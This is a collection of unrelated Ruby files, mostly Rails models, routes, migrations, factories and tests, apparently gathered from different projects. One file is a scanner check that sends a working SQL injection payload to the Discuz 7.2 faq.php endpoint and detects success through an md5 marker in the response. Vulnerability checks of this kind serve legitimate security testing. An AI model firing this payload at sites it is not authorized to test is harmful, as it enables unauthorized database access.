        transaction.zscore(leaderboard_name, member)
      end
    end unless leaderboard_options[:members_only]

    members.each_with_index do |member, index|
      data = {}
      data[@member_key] = member
      unless leaderboard_options[:members_only]
        data[@score_key] = responses[index * 2 + 1].to_f if responses[index * 2 + 1]
        # Tie-aware rank: look the member's score up in the ties set.
        if @reverse
          data[@rank_key] = @redis_connection.zrank(ties_leaderboard_key(leaderboard_name), data[@score_key].to_s) + 1 rescue nil
        else
          data[@rank_key] = @redis_connection.zrevrank(ties_leaderboard_key(leaderboard_name), data[@score_key].to_s) + 1 rescue nil
        end
      end

      if leaderboard_options[:with_member_data]
        data[@member_data_key] = member_data_for_in(leaderboard_name, member)
      end

      ranks_for_members << data
    end

    case leaderboard_options[:sort_by]
    when :rank
      ranks_for_members = ranks_for_members.sort_by { |member| member[@rank_key] }
    when :score
      ranks_for_members = ranks_for_members.sort_by { |member| member[@score_key] }
    end

    ranks_for_members
  end

  protected

  # Key for ties leaderboard.
  #
  # @param leaderboard_name [String] Name of the leaderboard.
  #
  # @return a key in the form of +leaderboard_name:ties_namespace+
  def ties_leaderboard_key(leaderboard_name)
    "#{leaderboard_name}:#{@ties_namespace}"
  end
end
# frozen_string_literal: true

# Pundit policy for Tag records.
class TagPolicy < ApplicationPolicy
  # Scope restricting which tags a given user may see.
  class Scope
    attr_reader :user, :scope

    def initialize(user, scope)
      @user = user
      @scope = scope
    end

    # Global-role users see every tag; everyone else sees tags belonging to
    # any of their organizations, plus tags flagged as shared.
    def resolve
      if user.global_role?
        scope.all
      else
        scope.where(organization_id: user.membership_organizations).or(scope.where(shared: true))
      end
    end

    # Tags visible within one specific organization (plus shared tags).
    def resolve_for_organization_id(organization_id)
      scope.where(organization_id: organization_id).or(scope.where(shared: true))
    end
  end
end
|
# Benchmarks the "unseen subject" selection query for a batch of ten
# simulated users, then prints min/max/average/median query times.
# Run this as a concurrent set of users from the
# 'concurrent_selection_simulation.sh' script.
class SelectionSimulation
  # Decimal places used when reporting timing statistics.
  NUM_TO_ROUND = 5

  def initialize(user_offset)
    @retire_num = 3
    # @active_user_set = User.limit(10).offset(user_offset).map(&:id)
    @active_user_set = (1..10).map { |n| user_offset + n }
    @query_times = []
  end

  # Times one selection per simulated user and prints the collected stats.
  def run
    # Prime the DB connection so the first measured query isn't penalized.
    ProjectSubject.first
    @active_user_set.each { |user_id| select_user_subjects(user_id) }
    puts "#{@query_times.min}, #{@query_times.max}, #{ave_query_time}, #{median_query_time}, [ #{@query_times.join(" ")} ]"
  end

  private

  # Measures one selection query (active, unseen-by-user, not yet retired).
  def select_user_subjects(user_id)
    # query = "'#{user_id}' != ALL (seen_user_ids) AND (array_length(seen_user_ids, 1) IS NULL OR array_length(seen_user_ids, 1) < #{@retire_num})"
    query = "NOT (seen_user_ids @> '{#{user_id}}') AND (array_length(seen_user_ids, 1) IS NULL OR array_length(seen_user_ids, 1) < #{@retire_num})"
    elapsed = Benchmark.measure do
      ProjectSubject.where(active: true).where(query).limit(100).sample(10)
    end
    @query_times << elapsed.real
    # Don't saturate the machine — limit to roughly 10 queries per second.
    sleep(0.1)
  end

  # Memoized sample count (taken once, when the stats are first computed).
  def query_times_length
    @qt_length ||= @query_times.length
  end

  def ave_query_time
    (@query_times.reduce(:+) / query_times_length).round(NUM_TO_ROUND)
  end

  def median_query_time
    len = query_times_length
    sorted = @query_times.sort
    mid = len / 2
    value = len.odd? ? sorted[mid] : (sorted[mid - 1] + sorted[mid]).to_f / 2
    value.round(NUM_TO_ROUND)
  end
end
|
# A like on a speak, made by either an ad user or an st user.
class Like < ApplicationRecord
  belongs_to :speak, optional: true
  belongs_to :st_user, optional: true
  belongs_to :ad_user, optional: true

  # Keeps a cached likes count on the parent speak.
  counter_culture :speak

  validates :ad_user_or_st_user, presence: true
  validates :speak_id, presence: true

  # Returns whichever owning user id is present (nil when neither is set),
  # so the presence validation above requires at least one owner.
  def ad_user_or_st_user
    ad_user_id.presence || st_user_id.presence
  end
end
|
require 'minitest/autorun'
require 'rubygems'
require 'bundler/setup'
require 'pry'
require 'mocha/mini_test'
require "net/http"
require 'sqlite3'
require File.join(__dir__, '..', '..', 'app', 'models', 'user')
# Fixed: removed the duplicate require of 'user_Submission' (wrong case) —
# on case-sensitive file systems it raises LoadError, and on case-insensitive
# ones it loads the same file as the line below.
require File.join(__dir__, '..', '..', 'app', 'models', 'user_submission')
ENV['environment'] = 'test'
# Minitest spec for the User model: persistence, cascade-saving of comments
# and submissions, and paging through the Reddit API via a mocked client.
describe User do
  before do
    @db = SQLite3::Database.new File.join(__dir__, '..', 'fixtures', 'subreddit_analysis_test.db')
    # Mock Reddit client: expects one user_from_name('foo') lookup.
    @client = MiniTest::Mock.new
    @client.expect(:user_from_name, stub(name: 'foo', to_json: { name: 'foo' }.to_json), ['foo'])
    User.connections(@db)
    User.reddit_client(@client)
    User.init_table
  end

  after do
    User.destroy_table
    @db.close
  end

  describe "new instance" do
    before do
      @user = User.new
      @user.name = 'foo'
    end
    it "lazy loads reddit_object" do
      @user.reddit_object
      assert(@client.verify)
    end
    it "default submitted_ended_at to 0" do
      assert_equal(0, @user.submissions_ended_at)
    end
    it "default comments_ended_at to 0" do
      assert_equal(0, @user.comments_ended_at)
    end
    it "saves" do
      @user.save
      assert_equal(1, @db.execute("select count(*) from users;").first.first)
    end

    describe "cascade save" do
      before do
        UserComment.init_table
        UserSubmission.init_table
        @user.comments = [UserComment.new(user: @user, subreddit_name: 'funny')]
        @user.submissions = [UserSubmission.new(user: @user, subreddit_name: 'funny')]
        @user.save
      end
      after do
        UserComment.destroy_table
        UserSubmission.destroy_table
      end
      it "cascade saves comments" do
        assert_equal(1, @db.execute("select count(*) from user_comments where user_name='#{@user.name}';").first.first)
      end
      it "cascade saves submissions" do
        assert_equal(1, @db.execute("select count(*) from user_submissions where user_name='#{@user.name}';").first.first)
      end
    end

    describe "get_comments" do
      before do
        mock_comment = stub(subreddit: 'foo_subreddit', fullname: 'qey44v')
        @reddit_object = MiniTest::Mock.new
        @reddit_object.expect(:nil?, false)
        @reddit_object.expect(:get_comments, [mock_comment], [{limit: 100, count: 10, after: 'bar'}])
        # Pre-seed a comment for the same subreddit so the fetch de-duplicates.
        @user.comments = [UserComment.new(user: @user, subreddit_name: 'foo_subreddit')]
        @user.reddit_object = @reddit_object
        @user.comments_after = 'bar'
        @user.get_comments(100, 10)
      end
      it "gets comments from reddit" do
        assert(@reddit_object.verify)
      end
      it "uniques the list" do
        assert_equal(1, @user.comments.length)
      end
      it "increments ended at" do
        assert_equal(100, @user.comments_ended_at)
      end
      it "sets after" do
        assert_equal('qey44v', @user.comments_after)
      end
    end

    describe "get_submissions" do
      before do
        reddit_submission = stub(subreddit: 'foo_subreddit', fullname: 'qey44v')
        @reddit_object = MiniTest::Mock.new
        @reddit_object.expect(:nil?, false)
        @reddit_object.expect(:get_submitted, [reddit_submission], [{limit: 100, count: 10, after: 'bar'}])
        @user.submissions = [UserSubmission.new(user: @user, subreddit_name: 'foo_subreddit', name: 'bar_name')]
        @user.reddit_object = @reddit_object
        @user.submissions_after = 'bar'
        @user.get_submissions(100, 10)
      end
      it "gets submissions from reddit" do
        assert(@reddit_object.verify)
      end
      it "uniques the list" do
        assert_equal(1, @user.submissions.length)
      end
      it "increments ended at" do
        assert_equal(100, @user.submissions_ended_at)
      end
      it "sets after" do
        assert_equal('qey44v', @user.submissions_after)
      end
    end
  end

  describe 'create' do
    before do
      User.create('foo')
    end
    it "finds user_from_name" do
      assert(@client.verify)
    end
    it "creates database" do
      assert(@db.execute("select count(*) from users where name = 'foo';").first.first == 1)
    end
  end

  describe 'find' do
    before do
      UserComment.init_table
      UserSubmission.init_table
      user = User.create('foo')
      UserSubmission.create(user, 'foo_subreddit')
      UserComment.create(user, 'foo_subreddit')
      @user = User.find('foo')
    end
    after do
      UserComment.destroy_table
      UserSubmission.destroy_table
    end
    it "finds user by name" do
      assert_equal('foo', @user.name)
    end
    it "finds existing comments" do
      assert_equal(1, @user.comments.length)
    end
    it "finds existing submissions" do
      assert_equal(1, @user.submissions.length)
    end
  end

  it "inits db" do
    assert(@db.execute("select count(*) from users;").first.first == 0)
  end
end
|
# Application routing. For details on the DSL available within this file, see
# http://guides.rubyonrails.org/routing.html
Rails.application.routes.draw do
  #get 'welcome/index'
  devise_for :users
  #root :to => 'posts#index'
  resources :posts

  # Routes for users_controller.
  # NOTE(review): the follow route is mapped on the "/like" path while the
  # unfollow route lives on "/unlike" — confirm the naming asymmetry.
  get "all_users", to: "users#all_users", as: "all_users"
  patch "/users/:id/like", to: "users#follow", as: "follow"
  #get "/users/:id/dashboard", to: "users#dashboard", as: "user_dashboard"
  patch "/posts/:id/adds", to: "posts#adds", as: "adds"
  post "/posts/add_category", to: "posts#add_category", as: "add_category"
  delete "/users/:id/unadds", to: "users#unadds", as: "unadds"
  delete "/users/:id/unlike", to: "users#unfollow", as: "unfollow"
  get "/users/:id/dashboard", to: "users#dashboard", as: "user_dashboard"
  get "/users/:id/profile", to: "users#profile", as: "user_profile"

  # Routes for categories_controller.
  get "/categories", to: "categories#index", as: "categories"
  get "/categories/:id", to: "categories#show", as: "category"
  post "/categories", to: "categories#create", as: "create_category"
  patch "/category/:id", to: "categories#update", as: "update_category"
  delete "/category/:id", to: "categories#destroy", as: "destroy_category"

  root :to => 'welcome#index'
end
|
# Adds agreement_id and institutional_program_id integer columns across the
# production-record tables.
class AddAgreementAndInstitutionalProgramsToAll < ActiveRecord::Migration
  # Tables that gain an agreement_id column.
  AGREEMENT_TABLES = %i[
    activities article_referees awards books conference_articles conferences
    journal_articles networks organizers patents projects
    scientific_associations scientific_visits works
  ].freeze

  # Tables that gain an institutional_program_id column.
  # NOTE(review): unlike the agreement list, :projects is absent here —
  # confirm the omission is intentional.
  INSTITUTIONAL_PROGRAM_TABLES = %i[
    activities article_referees awards books conference_articles conferences
    journal_articles networks organizers patents
    scientific_associations scientific_visits works
  ].freeze

  def change
    AGREEMENT_TABLES.each do |table|
      add_column table, :agreement_id, :integer
    end
    INSTITUTIONAL_PROGRAM_TABLES.each do |table|
      add_column table, :institutional_program_id, :integer
    end
  end
end
|
FactoryGirl.define do
  # Base tag: valid name with an associated user.
  factory :tag do
    name "test"
    user

    # Inherits from :tag; nil name makes the record fail validation.
    factory :invalid_tag do
      name nil
      user
    end

    # Tag with associated contacts; override contacts_count to change how
    # many are created.
    factory :tag_with_contacts do
      transient do
        contacts_count 2
      end
      after(:create) do |tag, evaluator|
        create_list(:contact, evaluator.contacts_count, tag: tag)
      end
    end
  end
end
|
# Adds indexed foreign-key columns: documents/photos reference a notice,
# and notices reference a project.
class AddIndexesToUserNoticePhotoDocument < ActiveRecord::Migration
  def change
    add_column :documents, :notice_id, :integer
    add_index :documents, :notice_id
    add_column :photos, :notice_id, :integer
    add_index :photos, :notice_id
    add_column :notices, :project_id, :integer
    add_index :notices, :project_id
  end
end
|
# frozen_string_literal: true

require 'test_helper'

# Tests the "string" template handler: templates are plain Ruby string
# interpolation (#{...}) evaluated against the view context.
class StringTemplateTest < Minitest::Test
  def setup
    # ActionView 6 changed view construction: it requires an empty template
    # cache and view paths; older versions take a LookupContext directly.
    @view = if ActionView::VERSION::MAJOR >= 6
      Class.new(ActionView::Base.with_empty_template_cache).with_view_paths([__dir__])
    else
      Class.new(ActionView::Base).new(ActionView::LookupContext.new(__dir__))
    end
    super
  end

  # Renders +template+ inline with the string handler and asserts the output.
  def assert_render(expected, template, options = {})
    result = @view.render(options.merge(inline: template, type: 'string'))
    assert_equal expected, result
  end

  def test_no_interpolation
    assert_render 'hello', 'hello'
  end

  def test_basic_interpolation
    assert_render 'hello', '#{"hello"}'
  end

  def test_ivar
    @view.instance_variable_set :@foo, 'hello'
    assert_render 'hello', '#{@foo}'
  end

  def test_if
    assert_render 'hello', '#{if true;"hello";end}'
    assert_render 'hello', '#{"hello" if true}'
  end

  def test_each_as_map_and_join
    assert_render "hello\nhello\nhello",
      '#{[*1..3].map do
        "hello"
      end.join("\n")}'
  end

  def test_each_with_object
    assert_render "hello\nhello\nhello\n",
      '#{[*1..3].each_with_object("".dup) do |i, s|
        s << "hello\n"
      end}'
  end

  def test_locals
    assert_render 'hello', '#{foo}', locals: {foo: 'hello'}
  end

  def test_render_partial
    result = @view.render(template: 'main', handlers: :string)
    assert_equal 'hello, world!', result.strip
  end
end
|
# Login/logout (session) management.
class SessionsController < ApplicationController
  # The login pages themselves must be reachable without a session.
  skip_before_filter :check_authentication

  # GET — renders the login form.
  def new
    @title = "login"
  end

  # POST — authenticates primary_email/password. On success stores the user
  # id in a fresh session (rotated to prevent session fixation) and redirects
  # to the originally requested path or the user's person page.
  def create
    begin
      @request_path = session[:request_path]
      reset_session
      @session_user = SimpleUser.authenticate(params[:primary_email], params[:password])
      if @session_user
        session[:user] = @session_user.id
        redirect_to @request_path.present? ? @request_path : person_path(@session_user) and return true
      else
        redirect_to :welcome
      end
    rescue SecurityError => e
      flash[:error] = 'The email address or password you provided does not match our records.'
      redirect_to :login
    rescue
      # NOTE(review): this bare rescue silently swallows any other
      # StandardError (no redirect, no logging) — confirm that is intentional.
    end
  end

  # DELETE — clears all session state and returns to the welcome page.
  def destroy
    @session_user = nil
    session[:user] = nil
    reset_session
    redirect_to :welcome
  end
end
|
# encoding: utf-8
require 'net/http'
require 'uri'
# Probe for the Discuz 7.2 faq.php SQL injection (grouppermission gids).
class Exploit_3 < Playload::Issue
  def initialize
    @name = "Discuz7.2 SQL"
    @type = "discuz"
    @tags = "discuz"
    @description = %q{Discuz7.2 faq.php Sql Exp: /bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23}
    @references = {'sebug' => 'http://sebug.net/vuldb/ssvid-87114'}
    @severity = :high
    @remedy_guidance = "SQL过滤"
    @is_found = false
    @is_error = false
  end

  # Fires the probe request at +url+ and marks the issue as found when the
  # injected md5-based marker shows up in the response body. Network
  # failures are reported to stdout and leave the flags untouched.
  def exp(url)
    target = URI(url + '/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23')
    reply = Net::HTTP.get_response(target)
    @is_found = true if reply.body.include?('c4ca4238a0b923820dcc509a6f75849b1')
  rescue
    puts "Send Exp Failed: #{$!}"
  end
end
# Register an instance of this check with the global queue so it runs
# alongside the other exploits.
Playload::Queue.add Exploit_3.new
|
# Join model bridging Book and Tag (many-to-many link table).
class Tagging < ApplicationRecord
belongs_to :book
belongs_to :tag
end
|
# @param {Integer[]} nums
# @return {Boolean}
# True when any value appears at least twice in +nums+, false otherwise
# (an empty array therefore yields false).
def contains_duplicate(nums)
  seen = {}
  nums.each do |value|
    # Short-circuit on the first repeated value.
    return true if seen.key?(value)
    seen[value] = true
  end
  false
end
|
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the bin/rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
require 'faker'
# Restaurant.destroy_all
# Seed 50 fake restaurants, each with a single placeholder five-star review.
# (The old message claimed 100, but the loop has always run 50 times.)
puts 'Creating 50 fake restaurants...'
50.times do
  restaurant = Restaurant.new(
    name: Faker::Company.name,
    address: "#{Faker::Address.street_address}, #{Faker::Address.city}",
    category: ['American', 'Italian', 'Dutch', 'Greek', 'French', 'Turkish'].sample,
    phone_number: Faker::PhoneNumber.phone_number_with_country_code
  )
  # save! raises on validation failure so a bad seed aborts loudly.
  restaurant.save!
  review = Review.new(content: "blah", rating: 5)
  review.restaurant = restaurant
  review.save!
end
puts 'Finished!'
|
#!/usr/bin/ruby -w
#
# Test etch's handling of creating and updating the original (orig) and
# history files
#
require File.expand_path('etchtest', File.dirname(__FILE__))
class EtchHistoryTests < Test::Unit::TestCase
include EtchTests
# Prepares a fresh etch target file, test repository, server handle, and
# client working directory for every test, and precomputes the expected
# orig-backup and history paths for the target.
def setup
# Generate a file to use as our etch target/destination
@targetfile = released_tempfile
#puts "Using #{@targetfile} as target file"
# Generate a directory for our test repository
@repodir = initialize_repository
@server = get_server(@repodir)
# Create a directory to use as a working directory for the client
@testroot = tempdir
#puts "Using #{@testroot} as client working directory"
@origfile = File.join(@testroot, 'var', 'etch', 'orig', "#{@targetfile}.ORIG")
@historydir = File.join(@testroot, 'var', 'etch', 'history', "#{@targetfile}.HISTORY")
end
# Exercises the full lifecycle: original backup + history start, history
# updates on change, revert, and no-touch behavior after a revert.
def test_history
#
# Ensure original file is backed up and history log started
#
testname = 'initial history test'
# Put some text into the original file so that we can make sure it was
# properly backed up.
origcontents = "This is the original text\n"
File.open(@targetfile, 'w') do |file|
file.write(origcontents)
end
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents, get_file_contents(@origfile), 'original backup of file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, '0000')), '0000 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, 'current')), 'current history file')
#
# Ensure history log is updated and original file does not change
#
testname = 'history update'
updatedsourcecontents = "This is a second test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(updatedsourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents, get_file_contents(@origfile), 'original backup of file unchanged')
assert_equal(origcontents, get_file_contents(File.join(@historydir, '0000')), '0000 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, '0001')), '0001 history file')
assert_equal(updatedsourcecontents, get_file_contents(File.join(@historydir, 'current')), 'updated current history file')
#
# Test revert feature
#
testname = 'revert'
# Intentionally mix revert with other instructions to make sure the file
# is reverted and nothing else happens.
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<revert/>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents, get_file_contents(@targetfile), 'original contents reverted')
assert(!File.exist?(@origfile), 'reverted original file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, '0000')), '0000 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, '0001')), '0001 history file')
assert_equal(updatedsourcecontents, get_file_contents(File.join(@historydir, '0002')), '0002 history file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, 'current')), 'reverted current history file')
#
# Update the contents of a reverted file and make sure etch doesn't
# overwrite them, as it should no longer be managing the file.
#
testname = 'no update to reverted file'
updatedorigcontents = "This is new original text\n"
File.open(@targetfile, 'w') do |file|
file.write(updatedorigcontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(updatedorigcontents, get_file_contents(@targetfile), 'Updated original contents unchanged')
assert(!File.exist?(@origfile), 'reverted original file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, 'current')), 'Updated reverted current history file')
end
def test_history_setup
#
# Use a setup command to put some contents into the target file (to
# simulate a common usage of setup commands to install a package before
# we backup the original file so that the original file has the default
# config file contents) and ensure those contents are backed up as the
# original file.
#
# Generate the file contents with a script which incorporates the original
# contents so that we also ensure that the client sends us the correct
# contents on the first try. We once had a bug where it took a couple of
# tries before we achieved convergence and the client sent the correct
# original contents.
#
testname = 'history setup'
origcontents = "This is the original text"
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<setup>
<exec>echo "#{origcontents}" > #{@targetfile}</exec>
</setup>
<file>
<warning_file/>
<source>
<script>source.script</script>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source.script", 'w') do |file|
file.puts("@contents << '#{sourcecontents}'")
file.puts("@contents << IO.read(@original_file)")
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents + "\n", get_file_contents(@origfile), 'original backup of file via setup')
assert_equal(sourcecontents + origcontents + "\n", get_file_contents(@targetfile), 'contents using original backup of file via setup')
end
def test_delayed_history_setup
#
# Like the previous test this uses a setup command to put some content
# into the target file. However, the first run of etch is such that there
# is no configuration for the file on this particular client, and then a
# second run where the client is added to a node group such that the
# configuration for the file now applies. Ensure that the original is not
# saved until after the file configuration applies to this host and the
# setup command has a chance to run.
#
# Imagine for example that you have configuration for DNS servers in your
# repository, which includes a setup command which installs BIND and then
# configuration which operates on the original config file from the BIND
# package. You have a server that is running etch but not configured as
# anything particular and you decide to make it a DNS server. If etch
# saved the original file the first time it ran on that box it would have
# saved a NOORIG file, and then when you added the box to the dns_servers
# node group the setup command would run, install BIND (which would create
# the config file), but continue to report an empty original file.
#
testname = 'delayed history setup'
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
</file>
</config>
EOF
end
assert_etch(@server, @testroot, :testname => 'delayed history setup, first run')
origcontents = "This is the original text for #{testname}"
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<setup>
<exec>echo "#{origcontents}" > #{@targetfile}</exec>
</setup>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "Test #{testname}\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents + "\n", get_file_contents(@origfile), testname)
end
def test_history_link
#
# Ensure original file is backed up when it is a link
#
testname = 'history link'
# Generate another file to use as our link target
@destfile = released_tempfile
# Make the original target a link
File.delete(@targetfile)
File.symlink(@destfile, @targetfile)
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(@destfile, File.readlink(@origfile), 'original backup of link')
assert_match("#{@targetfile} -> #{@destfile}", get_file_contents(File.join(@historydir, '0000')), '0000 history file of link')
end
def test_history_directory
#
# Ensure original file is backed up when it is a directory
#
testname = 'history directory'
# Make the original target a directory
File.delete(@targetfile)
Dir.mkdir(@targetfile)
File.open(File.join(@targetfile, 'testfile'), 'w') { |file| }
# Gather some stats about the file before we run etch
before_uid = File.stat(@targetfile).uid
before_gid = File.stat(@targetfile).gid
before_mode = File.stat(@targetfile).mode
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
# Intentionally create the directory with different ownership and perms
# than the original so that we can test that the original was properly
# backed up.
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<directory>
<owner>12345</owner>
<group>12345</group>
<perms>751</perms>
<create/>
</directory>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert(File.directory?(@origfile), 'original backup of directory')
# Verify that etch backed up the original directory properly
assert_equal(before_uid, File.stat(@origfile).uid, 'original directory uid')
assert_equal(before_gid, File.stat(@origfile).gid, 'original directory gid')
assert_equal(before_mode, File.stat(@origfile).mode, 'original directory mode')
# Check that the history log looks reasonable, it should contain an
# 'ls -ld' of the directory
assert_match(" #{@targetfile}", get_file_contents(File.join(@historydir, '0000')), '0000 history file of directory')
end
def test_history_directory_contents
#
# Ensure original file is backed up when it is a directory and it is
# being converted to something else, as the original backup is handled
# differently in that case
#
testname = 'history directory'
origtarfile = File.join(@testroot, 'var', 'etch', 'orig', "#{@targetfile}.TAR")
# Make the original target a directory
File.delete(@targetfile)
Dir.mkdir(@targetfile)
File.open(File.join(@targetfile, 'testfile'), 'w') { |file| }
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<overwrite_directory/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
# In this case, because we converted a directory to something else the
# original will be a tarball of the directory
assert(File.file?(origtarfile), 'original backup of directory converted to file')
# The tarball should have two entries, the directory and the 'testfile'
# we put inside it
assert_equal('2', `tar tf #{origtarfile} | wc -l`.chomp.strip, 'original backup of directory contents')
end
def test_history_conversion
#
# Test the conversion of old RCS history logs to the new format
#
testname = 'history conversion'
# It is getting harder and harder to find a package of RCS for
# modern operating systems. And at this point the likelihood of
# anyone still having unconverted history logs is getting vanishingly
# small. So if we don't have the RCS executables available just skip
# these tests.
if `which ci` == '' || `which co` == ''
return
end
# Mock up an original file and RCS history log
mockorigcontents = "This is the original text\n"
FileUtils.mkdir_p(File.dirname(@origfile))
File.open(@origfile, 'w') do |file|
file.write(mockorigcontents)
end
historyparent = File.dirname(@historydir)
FileUtils.mkdir_p(historyparent)
File.open(@historydir, 'w') do |file|
file.write(mockorigcontents)
end
histrcsdir = File.join(historyparent, 'RCS')
FileUtils.mkdir_p(histrcsdir)
histbase = File.basename(@historydir)
system(
"cd #{historyparent} && " +
"ci -q -t-'Original of an etch modified file' " +
"-m'Update of an etch modified file' #{histbase} && " +
"co -q -r -kb #{histbase}")
mocksourcecontents = "This is the contents in the RCS history log\n"
system("cd #{historyparent} && co -q -l #{histbase}")
File.open(@historydir, 'w') do |file|
file.write(mocksourcecontents)
end
system(
"cd #{historyparent} && " +
"ci -q -t-'Original of an etch modified file' " +
"-m'Update of an etch modified file' #{histbase} && " +
"co -q -r -kb #{histbase}")
File.open(@targetfile, 'w') do |file|
file.write(mocksourcecontents)
end
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(mockorigcontents, get_file_contents(File.join(@historydir, '0000')), 'RCS conv 0000 history file')
assert_equal(mocksourcecontents, get_file_contents(File.join(@historydir, '0001')), 'RCS conv 0001 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, 'current')), 'RCS conv current history file')
end
# Removes the repository, client working directory, and target file created
# in setup.
def teardown
remove_repository(@repodir)
FileUtils.rm_rf(@testroot)
FileUtils.rm_rf(@targetfile)
end
end
|
House::Application.routes.draw do
  # Site root.
  root 'mixes#index'

  # Mix resource, spelled out route by route. Note that no PUT route is
  # defined for update (only PATCH), so `resources :mixes` would not be an
  # exact equivalent.
  get    '/mixes/new',      to: 'mixes#new',    as: 'new_mix'
  post   '/mixes',          to: 'mixes#create', as: 'mixes'
  get    '/mixes',          to: 'mixes#index'
  get    '/mixes/:id',      to: 'mixes#show',   as: 'mix'
  get    '/mixes/:id/edit', to: 'mixes#edit',   as: 'edit_mix'
  patch  '/mixes/:id',      to: 'mixes#update'
  delete '/mixes/:id',      to: 'mixes#destroy'

  # Dj resource, mirroring the mix routes.
  get    '/djs/new',      to: 'djs#new',    as: 'new_dj'
  post   '/djs',          to: 'djs#create', as: 'djs'
  get    '/djs',          to: 'djs#index'
  get    '/djs/:id',      to: 'djs#show',   as: 'dj'
  get    '/djs/:id/edit', to: 'djs#edit',   as: 'edit_dj'
  patch  '/djs/:id',      to: 'djs#update'
  delete '/djs/:id',      to: 'djs#destroy'

  # For resourceful shortcuts (`resources`, nesting, concerns, namespaces)
  # see the Rails guide "Rails Routing from the Outside In", and inspect the
  # generated table with `rake routes`.
end
|
# An expense with an associated expense type.
# NOTE(review): `has_one :expensetype` puts the foreign key on expensetypes;
# if expenses carry the expensetype_id column this should be `belongs_to` —
# confirm against the schema.
class Expense < ApplicationRecord
has_one :expensetype
end
|
# Creates the product_categories table (with parent/sale references and a
# default list ordering) plus the lookup indexes, and drops it on rollback.
class CreateProductCategories < ActiveRecord::Migration
  def up
    create_table "product_categories" do |t|
      t.string   "title"
      t.integer  "list_order", default: 999
      t.datetime "created_at"
      t.datetime "updated_at"
      t.integer  "parent_id"
      t.integer  "sale_id"
    end

    add_index "product_categories", ["list_order"], name: "index_product_categories_on_list_order"
    add_index "product_categories", ["parent_id"],  name: "index_product_categories_on_parent_id"
    add_index "product_categories", ["sale_id"],    name: "index_product_categories_on_sale_id"
  end

  def down
    drop_table :product_categories
  end
end
# A record owned by a Zone; the name attribute is mandatory.
